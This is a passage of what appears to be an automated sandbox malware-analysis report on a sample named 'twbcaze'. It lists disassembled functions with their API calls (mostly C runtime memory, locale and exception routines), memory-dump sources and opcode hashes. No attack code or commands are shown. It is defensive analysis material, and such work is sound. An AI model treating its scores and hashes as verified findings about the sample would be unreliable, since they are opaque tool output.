                                          • API ID: CriticalEnterEnumLocalesSectionSystem
                                          • String ID:
                                          • API String ID: 1272433827-0
                                          • Opcode ID: 953393844af8742a9b13e35552c88550bb13006f42a261988265060d34067cbe
                                          • Instruction ID: c155d4f6f69a32a9f33b35c0b87616374ac339cdffedb24db3d0b567afc0008f
                                          • Opcode Fuzzy Hash: 953393844af8742a9b13e35552c88550bb13006f42a261988265060d34067cbe
                                          • Instruction Fuzzy Hash: 18F04972A00205DFD714EFA9E802B9C77F0FB08725F10813BF4159B2A0DBB959448F88
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041FE4B Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0041AE68: GetLastError.KERNEL32(?,00000004,00000008,0041CF9A), ref: 0041AE6D
                                            • Part of subcall function 0041AE68: SetLastError.KERNEL32(00000000,00000005,000000FF), ref: 0041AF0B
                                          • EnumSystemLocalesW.KERNEL32(0041FE96,00000001,?,?,?,0041F8D5,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 0041FE82
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$EnumLocalesSystem
                                          • String ID:
                                          • API String ID: 2417226690-0
                                          • Opcode ID: 50cf606f12fb6068bb740480a684c40f42bd637fc16ac47e8b4177ad5752fd96
                                          • Instruction ID: 5d494e22a839b8941f7a5cf9bad4199b12191afd7fddc6f0321c008e8b6c3cc5
                                          • Opcode Fuzzy Hash: 50cf606f12fb6068bb740480a684c40f42bd637fc16ac47e8b4177ad5752fd96
                                          • Instruction Fuzzy Hash: 90F055363003055BCB04AF36C8057AA7F90FFC1B20F4A446AEA098B661C279D883C7A4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041B7A1 Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,00414A3E,?,20001004,00000000,00000002,?,?,0041394F), ref: 0041B7D5
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: InfoLocale
                                          • String ID:
                                          • API String ID: 2299586839-0
                                          • Opcode ID: e48499ab266b0892f3b4504df124296d4778d481d906684320cb99722dabcb31
                                          • Instruction ID: 124347de3793c581400af35f8a4421bdb06ed394f8b1b239c189508931d0d36e
                                          • Opcode Fuzzy Hash: e48499ab266b0892f3b4504df124296d4778d481d906684320cb99722dabcb31
                                          • Instruction Fuzzy Hash: 2BE04F31500218BBCF122F62EC04EEE3E25FF84B61F044426FD15A5660CB359961AAD9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041C365 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: HeapProcess
                                          • String ID:
                                          • API String ID: 54951025-0
                                          • Opcode ID: 30de50f748e8ccd228dd1156b15e34f2bb26469e6733cbd956434a7405b5d96c
                                          • Instruction ID: 6241e0b94bbbb734d1e683d2b47e32f90ed8bb3b58815520b7333dd1b4e06813
                                          • Opcode Fuzzy Hash: 30de50f748e8ccd228dd1156b15e34f2bb26469e6733cbd956434a7405b5d96c
                                          • Instruction Fuzzy Hash: 1FA002706051418B57504F3659456097B9956456D174950795405C5160D73485955F05
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0023017B Relevance: .1, Instructions: 60COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353557579.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_230000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6a074607bc74a68e46ffcf8def79e123d6f3babf0396bd4cc77b36b90dcd7b6b
                                          • Instruction ID: acf7f74089822b6f94aade79d7545bdb6bfceaa2a25a1c2d654adb3873f0154f
                                          • Opcode Fuzzy Hash: 6a074607bc74a68e46ffcf8def79e123d6f3babf0396bd4cc77b36b90dcd7b6b
                                          • Instruction Fuzzy Hash: B611A076620119AFC720EF69C8D0DAAB7E9EF147A4B008015FC58CB214E334ED91C7A4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0023013E Relevance: .0, Instructions: 26COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353557579.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_230000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ec8e751651157bc76042a6f737d25c3298a3c098193b98f67a4d4adab9605e7b
                                          • Instruction ID: 3ad2d8396a0310092979d8f36f3c8edb01107a5bffa56ac273248249f14a4264
                                          • Opcode Fuzzy Hash: ec8e751651157bc76042a6f737d25c3298a3c098193b98f67a4d4adab9605e7b
                                          • Instruction Fuzzy Hash: 99E06576264149AF8B04CBA8C891D25B3E8EB08720F140290F829C72A0E634FE009A60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00230109 Relevance: .0, Instructions: 23COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353557579.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_230000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 14c979a1a0daa279b65c5726769cbc87c4fd01d1be4397ac1552cbcc502d36f8
                                          • Instruction ID: a69375c47d1dbbb6acb626a6b153f78f779abe24d03dbacf762cb5b0bf713597
                                          • Opcode Fuzzy Hash: 14c979a1a0daa279b65c5726769cbc87c4fd01d1be4397ac1552cbcc502d36f8
                                          • Instruction Fuzzy Hash: 36E04F722306159BCB619F59C890D96F7E8EB88BB0F494465ED8D97610C230FC21CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041DCB5 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 68457055e56309d6262ebd5acc5efa2faa3e58b259cde901b40cef7cc98de610
                                          • Instruction ID: 73902aca3737ebb6aa25cc0b46af761766ced4a855fb01478713d698906d9789
                                          • Opcode Fuzzy Hash: 68457055e56309d6262ebd5acc5efa2faa3e58b259cde901b40cef7cc98de610
                                          • Instruction Fuzzy Hash: 7FE08CB2E11228EBCB14DB89C904DCAF3FCEB44B04B11089BB501E3210D2B4DE40DBD4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0023005F Relevance: .0, Instructions: 7COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353557579.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_230000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                          • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                                          • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                          • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00412AB2 Relevance: 28.4, APIs: 15, Strings: 1, Instructions: 357COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$Info
                                          • String ID: xxB
                                          • API String ID: 2509303402-3667342264
                                          • Opcode ID: 074cf2043d39f6f2a2ec9d745427b168db315ed45b2c7f53f00f735fe0ca8dd9
                                          • Instruction ID: c2d8d3651b6b28aa8005530c5d340ea9be875caa29cb56d7d51320ee634d503d
                                          • Opcode Fuzzy Hash: 074cf2043d39f6f2a2ec9d745427b168db315ed45b2c7f53f00f735fe0ca8dd9
                                          • Instruction Fuzzy Hash: 3DD19B719003059FDB21CF69C981BEEBBB5FF08304F14442AE499E7382E7B8A895CB54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041EC40 Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • ___free_lconv_mon.LIBCMT ref: 0041EC84
                                            • Part of subcall function 0041E09C: _free.LIBCMT ref: 0041E0B9
                                            • Part of subcall function 0041E09C: _free.LIBCMT ref: 0041E0CB
                                            • Part of subcall function 0041E09C: _free.LIBCMT ref: 0041E0DD
                                            • Part of subcall function 0041E09C: _free.LIBCMT ref: 0041E0EF
                                            • Part of subcall function 0041E09C: _free.LIBCMT ref: 0041E101
                                            • Part of subcall function 0041E09C: _free.LIBCMT ref: 0041E113
                                            • Part of subcall function 0041E09C: _free.LIBCMT ref: 0041E125
                                            • Part of subcall function 0041E09C: _free.LIBCMT ref: 0041E137
                                            • Part of subcall function 0041E09C: _free.LIBCMT ref: 0041E149
                                            • Part of subcall function 0041E09C: _free.LIBCMT ref: 0041E15B
                                            • Part of subcall function 0041E09C: _free.LIBCMT ref: 0041E16D
                                            • Part of subcall function 0041E09C: _free.LIBCMT ref: 0041E17F
                                            • Part of subcall function 0041E09C: _free.LIBCMT ref: 0041E191
                                          • _free.LIBCMT ref: 0041EC79
                                            • Part of subcall function 0041AC67: HeapFree.KERNEL32(00000000,00000000), ref: 0041AC7D
                                            • Part of subcall function 0041AC67: GetLastError.KERNEL32(?,?,0041E816,?,00000000,?,?,?,0041E4A5,?,00000007,?,?,0041EE00,?,?), ref: 0041AC8F
                                          • _free.LIBCMT ref: 0041EC9B
                                          • _free.LIBCMT ref: 0041ECB0
                                          • _free.LIBCMT ref: 0041ECBB
                                          • _free.LIBCMT ref: 0041ECDD
                                          • _free.LIBCMT ref: 0041ECF0
                                          • _free.LIBCMT ref: 0041ECFE
                                          • _free.LIBCMT ref: 0041ED09
                                          • _free.LIBCMT ref: 0041ED41
                                          • _free.LIBCMT ref: 0041ED48
                                          • _free.LIBCMT ref: 0041ED65
                                          • _free.LIBCMT ref: 0041ED7D
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                          • String ID:
                                          • API String ID: 161543041-0
                                          • Opcode ID: 2f63ca63c716220c0d4c04e40e5c3921a93d5613798f77c49c018e1ffe0315b8
                                          • Instruction ID: 1354addf16a3f454c898ff0f6fc87204fce7f1d58647e8555d413b2f4aaee27c
                                          • Opcode Fuzzy Hash: 2f63ca63c716220c0d4c04e40e5c3921a93d5613798f77c49c018e1ffe0315b8
                                          • Instruction Fuzzy Hash: 0E314F356006019FEB20AA37E989BD777E9AF00714F14481FE899D7351FB39ACD08759
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041DCE6 Relevance: 18.4, APIs: 12, Instructions: 373COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free
                                          • String ID:
                                          • API String ID: 269201875-0
                                          • Opcode ID: 2b9d407d24ff1b8dec256710db979ec8f0cbb5ed3a25258f5c8cd2a44b96bc88
                                          • Instruction ID: b0d49b581f4b3d539ad23d3e3bf310c071c4d5c23ef4697934c88d36206c30af
                                          • Opcode Fuzzy Hash: 2b9d407d24ff1b8dec256710db979ec8f0cbb5ed3a25258f5c8cd2a44b96bc88
                                          • Instruction Fuzzy Hash: CAC13776D40208AFDB60DBA9DC82FDE77F8DF48704F144156FA09FB282E674998187A4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041B179 Relevance: 15.1, APIs: 10, Instructions: 69COMMON
                                          Download Yara Rule
                                          APIs
                                          • _free.LIBCMT ref: 0041B18F
                                            • Part of subcall function 0041AC67: HeapFree.KERNEL32(00000000,00000000), ref: 0041AC7D
                                            • Part of subcall function 0041AC67: GetLastError.KERNEL32(?,?,0041E816,?,00000000,?,?,?,0041E4A5,?,00000007,?,?,0041EE00,?,?), ref: 0041AC8F
                                          • _free.LIBCMT ref: 0041B19B
                                          • _free.LIBCMT ref: 0041B1A6
                                          • _free.LIBCMT ref: 0041B1B1
                                          • _free.LIBCMT ref: 0041B1BC
                                          • _free.LIBCMT ref: 0041B1C7
                                          • _free.LIBCMT ref: 0041B1D2
                                          • _free.LIBCMT ref: 0041B1DD
                                          • _free.LIBCMT ref: 0041B1E8
                                          • _free.LIBCMT ref: 0041B1F6
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 3e7033108ade06db584e8432f0547c342aec702f3ac772aaa39963706a8954a4
                                          • Instruction ID: 313df82ac784d9d70091db3946e8ce5e55387cd0b564fa3fba2dc80b75e65f58
                                          • Opcode Fuzzy Hash: 3e7033108ade06db584e8432f0547c342aec702f3ac772aaa39963706a8954a4
                                          • Instruction Fuzzy Hash: E521E776900108AFCB01EF95C885DDE7BB8FF08744F0485AAF5199B621EB35EA94CB85
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041A2F7 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 303COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • type_info::operator==.LIBVCRUNTIME ref: 0041A416
                                          • CatchIt.LIBVCRUNTIME ref: 0041A575
                                          • _UnwindNestedFrames.LIBCMT ref: 0041A676
                                          • CallUnexpected.LIBVCRUNTIME ref: 0041A691
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CallCatchFramesNestedUnexpectedUnwindtype_info::operator==
                                          • String ID: csm$csm$csm$hlB
                                          • API String ID: 2332921423-3326005231
                                          • Opcode ID: e6989ae63762e0012af0327cfa4b957421d7abe09db2198d338f7d8fbbd44a32
                                          • Instruction ID: bf0c53ec1af481c16f39fe073d22349b7d07ad32e212adfb76973616b0a1cfb0
                                          • Opcode Fuzzy Hash: e6989ae63762e0012af0327cfa4b957421d7abe09db2198d338f7d8fbbd44a32
                                          • Instruction Fuzzy Hash: 09B17871801209EFCF29DFA5C9819EEB7B5BF04314F14405BE8556B202E778DEA1CB9A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041E19A Relevance: 13.7, APIs: 9, Instructions: 199COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free
                                          • String ID:
                                          • API String ID: 269201875-0
                                          • Opcode ID: 66f943d6fdb951f6ca5dc843215ade34feb826fafe0645fe4b26fdabc9c29dc0
                                          • Instruction ID: 84f6f0aa1e8644ddc0539ed4e746025fb0e3a19bbe4d1f7f3da16a2951e0159e
                                          • Opcode Fuzzy Hash: 66f943d6fdb951f6ca5dc843215ade34feb826fafe0645fe4b26fdabc9c29dc0
                                          • Instruction Fuzzy Hash: 7961C0759003059FDB20DF76C881BEBB7E8AB48710F14446BED59EB281FB74A9808B95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040FA92 Relevance: 12.2, APIs: 8, Instructions: 175COMMON
                                          Download Yara Rule
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 0040FADB
                                          • __alloca_probe_16.LIBCMT ref: 0040FB07
                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000,?,?,?,?,?,?,004047EE), ref: 0040FB46
                                          • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,004047EE), ref: 0040FB63
                                          • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,004047EE), ref: 0040FBA2
                                          • __alloca_probe_16.LIBCMT ref: 0040FBBF
                                          • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,004047EE), ref: 0040FC01
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000,?,?,?,?,?,?,004047EE), ref: 0040FC24
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                          • String ID:
                                          • API String ID: 2040435927-0
                                          • Opcode ID: c7f0382c200de1288c457e93c00c638dbe007d1ecd4d41b60b9608ac7cb25e35
                                          • Instruction ID: e1417c7bff74048c17493f3a773e66c8f2280b5088370d863b7d16ceba90c4e7
                                          • Opcode Fuzzy Hash: c7f0382c200de1288c457e93c00c638dbe007d1ecd4d41b60b9608ac7cb25e35
                                          • Instruction Fuzzy Hash: 23517F7261020AABEB309F51CC46FAB7BB9EF44754F14403ABD05F6690D738AC59CB98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00410A60 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 130COMMON
                                          Download Yara Rule
                                          APIs
                                          • _ValidateLocalCookies.LIBCMT ref: 00410A97
                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00410A9F
                                          • _ValidateLocalCookies.LIBCMT ref: 00410B28
                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00410B53
                                          • _ValidateLocalCookies.LIBCMT ref: 00410BA8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                          • String ID: csm
                                          • API String ID: 1170836740-1018135373
                                          • Opcode ID: 143a747af0ca9d0d0b1de1a2e253aee19515e48f7ac29c3e463687d02ec2b84a
                                          • Instruction ID: 9e609370faf7bb1396030742b487c5011d168dbd24c681577ab23c87187feb3b
                                          • Opcode Fuzzy Hash: 143a747af0ca9d0d0b1de1a2e253aee19515e48f7ac29c3e463687d02ec2b84a
                                          • Instruction Fuzzy Hash: 5841C630A052189BCF10EF69C844ADEBBB1AF4432CF14815AF8155B352D779A9D1CB99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041E48C Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0041E7EC: _free.LIBCMT ref: 0041E811
                                          • _free.LIBCMT ref: 0041E4DA
                                            • Part of subcall function 0041AC67: HeapFree.KERNEL32(00000000,00000000), ref: 0041AC7D
                                            • Part of subcall function 0041AC67: GetLastError.KERNEL32(?,?,0041E816,?,00000000,?,?,?,0041E4A5,?,00000007,?,?,0041EE00,?,?), ref: 0041AC8F
                                          • _free.LIBCMT ref: 0041E4E5
                                          • _free.LIBCMT ref: 0041E4F0
                                          • _free.LIBCMT ref: 0041E544
                                          • _free.LIBCMT ref: 0041E54F
                                          • _free.LIBCMT ref: 0041E55A
                                          • _free.LIBCMT ref: 0041E565
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 4fa3af1e4e2541f5a962136ba2ef0094dd114dc65fa6a56b2720c2e6f46b313b
                                          • Instruction ID: 284df9f1b7a7b18ebc2636481bb3a9bc6959072237368f804615af593e33ab9b
                                          • Opcode Fuzzy Hash: 4fa3af1e4e2541f5a962136ba2ef0094dd114dc65fa6a56b2720c2e6f46b313b
                                          • Instruction Fuzzy Hash: 5211AF39601B44ABE520F7B3DC4BFCBB79C5F00304F400C1EB6ED66192EA78B5944685
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004229F9 Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetConsoleOutputCP.KERNEL32 ref: 00422A41
                                          • __fassign.LIBCMT ref: 00422C26
                                          • __fassign.LIBCMT ref: 00422C43
                                          • WriteFile.KERNEL32(?,0041D2F5,00000000,?,00000000), ref: 00422C8B
                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00422CCB
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00422D73
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                          • String ID:
                                          • API String ID: 1735259414-0
                                          • Opcode ID: 6eadf0ef7b1578d9249ff99873997d0fd24100ea5cf61461da0c2fdd33d9f9ca
                                          • Instruction ID: dea6e254ba90a19633800a2bb2561a710fdd656b41b0a75608fd30b53b49681c
                                          • Opcode Fuzzy Hash: 6eadf0ef7b1578d9249ff99873997d0fd24100ea5cf61461da0c2fdd33d9f9ca
                                          • Instruction Fuzzy Hash: D4C1A071E002689FCF15CFA9D9809EDBBB5BF08304F28416AE815F7341D679A946CF68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00415E1F Relevance: 9.2, APIs: 6, Instructions: 238COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
